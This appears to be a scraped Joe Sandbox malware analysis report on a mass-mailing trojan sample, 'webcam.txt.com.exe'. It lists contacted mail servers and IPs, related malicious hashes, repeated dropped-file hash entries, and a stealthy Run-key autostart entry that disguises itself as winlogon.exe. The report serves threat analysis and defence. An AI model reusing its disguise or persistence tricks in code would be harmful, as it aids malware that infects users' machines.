                                                                                                                    http://ads.msn.com/webcam.txt.com.exe, 00000000.00000003.3133044573.0000000000545000.00000004.00000020.00020000.00000000.sdmp, webcam.txt.com.exe, 00000000.00000003.3136511757.0000000000545000.00000004.00000020.00020000.00000000.sdmp, webcam.txt.com.exe, 00000000.00000002.4112709818.0000000000545000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.apache.org/licenses/webcam.txt.com.exe, 00000000.00000003.1943099224.0000000002F21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://support.office.com/article/92c234f1-dc91-4dc1-925d-6c90fc3816d8webcam.txt.com.exe, 00000000.00000002.4112381428.0000000000500000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://raw.githubusercontent.com/jakearchibald/es6-promise/master/licensewebcam.txt.com.exe, 00000000.00000002.4112381428.0000000000500000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs
                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          173.228.157.41
                                                                                                                          pb-mx22.pobox.comUnited States
                                                                                                                          11403NYINTERNETUSfalse
                                                                                                                          209.51.188.92
                                                                                                                          eggs.gnu.orgUnited States
                                                                                                                          22989FREEASINFREEDOMUSfalse
                                                                                                                          52.101.73.10
                                                                                                                          outlook-com.olc.protection.outlook.comUnited States
                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                          66.196.36.12
                                                                                                                          mail.reg.caCanada
                                                                                                                          30158ARIMA-NETWORKSCAfalse
                                                                                                                          17.57.154.33
                                                                                                                          mx01.mail.icloud.comUnited States
                                                                                                                          714APPLE-ENGINEERINGUSfalse
                                                                                                                          192.254.190.168
                                                                                                                          onlineconnections.com.auUnited States
                                                                                                                          46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                          162.255.118.51
                                                                                                                          eforward1.registrar-servers.comUnited States
                                                                                                                          22612NAMECHEAP-NETUSfalse
                                                                                                                          104.47.66.10
                                                                                                                          alumni-caltech-edu.mail.protection.outlook.comUnited States
                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                          85.187.148.2
                                                                                                                          gzip.orgUnited States
                                                                                                                          55293A2HOSTINGUStrue
                                                                                                                          142.251.16.27
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          172.253.115.27
                                                                                                                          gmail-smtp-in.l.google.comUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          185.183.28.235
                                                                                                                          mxa-00377f01.gslb.pphosted.comNetherlands
                                                                                                                          52129PROOFPOINT-ASN-EUGBfalse
                                                                                                                          142.251.167.26
                                                                                                                          aspmx.l.google.comUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          64.29.151.236
                                                                                                                          ismtp.sitestar.everyone.netUnited States
                                                                                                                          30447INFB2-ASUSfalse
                                                                                                                          51.81.61.70
                                                                                                                          mx01.earthlink-vadesecure.netUnited States
                                                                                                                          16276OVHFRfalse
                                                                                                                          67.195.204.73
                                                                                                                          mta6.am0.yahoodns.netUnited States
                                                                                                                          26101YAHOO-3UStrue
                                                                                                                          131.111.8.146
                                                                                                                          mx.cam.ac.ukUnited Kingdom
                                                                                                                          786JANETJiscServicesLimitedGBfalse
                                                                                                                          Joe Sandbox version:38.0.0 Ammolite
                                                                                                                          Analysis ID:1353116
                                                                                                                          Start date and time:2023-12-04 12:55:49 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 10m 27s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:6
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:webcam.txt.com.exe
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.spre.troj.evad.winEXE@2/1025@150/17
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          • Number of executed functions: 30
                                                                                                                          • Number of non-executed functions: 24
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 17.32.222.242
                                                                                                                          • Excluded domains from analysis (whitelisted): apple.com, ocsp.digicert.com, slscr.update.microsoft.com, mx-in.g.apple.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                          • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                          TimeTypeDescription
                                                                                                                          11:56:38AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run ICQ Net C:\Windows\winlogon.exe -stealth
                                                                                                                          12:57:18API Interceptor9140687x Sleep call for process: webcam.txt.com.exe modified
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          173.228.157.41Transcript.exeGet hashmaliciousMyDoomBrowse
                                                                                                                            lsass(1).exeGet hashmaliciousMyDoomBrowse
                                                                                                                              sample1.exeGet hashmaliciousMyDoomBrowse
                                                                                                                                sample1-unpacked.exeGet hashmaliciousMyDoomBrowse
                                                                                                                                  sample1-unpacked.exeGet hashmaliciousMyDoomBrowse
                                                                                                                                    sample1-unpacked.exeGet hashmaliciousMyDoomBrowse
                                                                                                                                      sample1.exeGet hashmaliciousMyDoomBrowse
                                                                                                                                        message.exeGet hashmaliciousBrowse
                                                                                                                                          15jihu.exeGet hashmaliciousBrowse
                                                                                                                                            3attachment.doc .exeGet hashmaliciousBrowse
                                                                                                                                              3message.exeGet hashmaliciousBrowse
                                                                                                                                                41mai.exeGet hashmaliciousBrowse
                                                                                                                                                  46tex.exeGet hashmaliciousBrowse
                                                                                                                                                    8document.exeGet hashmaliciousBrowse
                                                                                                                                                      9file.exeGet hashmaliciousBrowse
                                                                                                                                                        .exeGet hashmaliciousBrowse
                                                                                                                                                          15text.exeGet hashmaliciousBrowse
                                                                                                                                                            21.txt .exeGet hashmaliciousBrowse
                                                                                                                                                              43messag.exeGet hashmaliciousBrowse
                                                                                                                                                                19documen.exeGet hashmaliciousBrowse
                                                                                                                                                                  209.51.188.92 .exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    .exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      ydbWyoxHsd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        Readme.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          document_excel.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            data.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              document.txt .exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                ivMI3veipP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  3posting_old_photos.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    49trash_secrets.doc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      40injection.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        17warez_moonlight.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          50story_description.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            3pic.doc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              1friend.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                9webcam_unfolds.rtf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  1violence_nothing.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    33stuff.rtf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      5trash_454543403.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        22nothing.htm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          pb-mx22.pobox.comTranscript.exeGet hashmaliciousMyDoomBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          file.log.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          data.log.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          message.txt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          test.dat.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          Update-KB7390-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          Update-KB6734-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          Update-KB5058-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          file.txt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          Update-KB250-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          Update-KB2984-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          doc.msg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          test.msg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          Update-KB3756-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          body.elm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          readme.txt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          Update-KB9504-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          Update-KB6340-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          file.msg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          lsass(1).exeGet hashmaliciousMyDoomBrowse
                                                                                                                                                                                                          • 173.228.157.41
                                                                                                                                                                                                          mta6.am0.yahoodns.netfile.exeGet hashmaliciousTofseeBrowse
                                                                                                                                                                                                          • 98.136.96.74
                                                                                                                                                                                                          file.msg.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 67.195.228.106
                                                                                                                                                                                                          file.exeGet hashmaliciousTofseeBrowse
                                                                                                                                                                                                          • 67.195.228.94
                                                                                                                                                                                                          .exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 98.136.96.91
                                                                                                                                                                                                          file.exeGet hashmaliciousTofseeBrowse
                                                                                                                                                                                                          • 98.136.96.76
                                                                                                                                                                                                          file.log.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 67.195.228.94
                                                                                                                                                                                                          data.log.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 67.195.228.109
                                                                                                                                                                                                          message.elm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 67.195.204.79
                                                                                                                                                                                                          message.txt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 98.136.96.77
                                                                                                                                                                                                          test.dat.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 98.136.96.77
                                                                                                                                                                                                          Update-KB7390-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 67.195.228.110
                                                                                                                                                                                                          Update-KB6734-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 67.195.228.111
                                                                                                                                                                                                          Update-KB5058-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 98.136.96.77
                                                                                                                                                                                                          Update-KB78-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 98.136.96.77
                                                                                                                                                                                                          file.txt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 67.195.204.72
                                                                                                                                                                                                          Update-KB250-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 98.136.96.74
                                                                                                                                                                                                          Update-KB2984-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 67.195.204.79
                                                                                                                                                                                                          doc.msg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 67.195.228.94
                                                                                                                                                                                                          3hTS09wZ7G.exeGet hashmaliciousRaccoon RedLine SmokeLoader TofseeBrowse
                                                                                                                                                                                                          • 67.195.228.110
                                                                                                                                                                                                          DUpgpAnHkq.exeGet hashmaliciousRaccoon RedLine SmokeLoader TofseeBrowse
                                                                                                                                                                                                          • 67.195.204.73
                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          NYINTERNETUSTranscript.exeGet hashmaliciousMyDoomBrowse
                                                                                                                                                                                                          • 64.147.108.55
                                                                                                                                                                                                          kRheyrmAko.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 66.111.5.62
                                                                                                                                                                                                          86fWog7Qh0.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 64.147.98.84
                                                                                                                                                                                                          8vlzmXygG4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 66.111.5.72
                                                                                                                                                                                                          Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 66.111.6.164
                                                                                                                                                                                                          27G1PCeLc8.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 64.147.98.10
                                                                                                                                                                                                          KMqGoudziq.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 63.165.249.188
                                                                                                                                                                                                          rUlulRRDHK.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 66.111.5.99
                                                                                                                                                                                                          6gjnnBAbpc.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                          • 66.111.4.72
                                                                                                                                                                                                          iJzpyjAehB.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                          • 66.111.4.75
                                                                                                                                                                                                          EksRd2mRLH.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                          • 66.111.4.75
                                                                                                                                                                                                          rLDmqbpt5D.exeGet hashmaliciousPushdo, DanaBot, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                          • 66.111.4.75
                                                                                                                                                                                                          .exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 64.147.108.52
                                                                                                                                                                                                          d4bNCWDk1F.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                          • 66.111.4.75
                                                                                                                                                                                                          .exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 64.147.108.51
                                                                                                                                                                                                          jAqT1F0Fpy.exeGet hashmaliciousPonyBrowse
                                                                                                                                                                                                          • 66.111.4.54
                                                                                                                                                                                                          MYorfmVq9Z.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                          • 66.111.4.75
                                                                                                                                                                                                          file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                          • 66.111.4.73
                                                                                                                                                                                                          nwk9iV8lpS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 66.111.4.72
                                                                                                                                                                                                          3ts2As2Bkm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 66.111.4.72
                                                                                                                                                                                                          FREEASINFREEDOMUShttp://www.redmine.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 209.51.188.116
                                                                                                                                                                                                          .exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 209.51.188.92
                                                                                                                                                                                                          .exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 209.51.188.92
                                                                                                                                                                                                          ydbWyoxHsd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 209.51.188.92
                                                                                                                                                                                                          Readme.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 209.51.188.92
                                                                                                                                                                                                          document_excel.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 209.51.188.92
                                                                                                                                                                                                          data.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 209.51.188.92
                                                                                                                                                                                                          document.txt .exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 209.51.188.92
                                                                                                                                                                                                          ivMI3veipP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 209.51.188.92
                                                                                                                                                                                                          FSvvTtQaTe.exeGet hashmaliciousGozi UrsnifBrowse
                                                                                                                                                                                                          • 209.51.188.148
                                                                                                                                                                                                          mIHAt2J1jc.exeGet hashmaliciousGozi UrsnifBrowse
                                                                                                                                                                                                          • 209.51.188.148
                                                                                                                                                                                                          Daine_tax_returns.docGet hashmaliciousNetWireBrowse
                                                                                                                                                                                                          • 209.51.188.148
                                                                                                                                                                                                          Daine_tax_returns.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 209.51.188.148
                                                                                                                                                                                                          No context
                                                                                                                                                                                                          No context
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
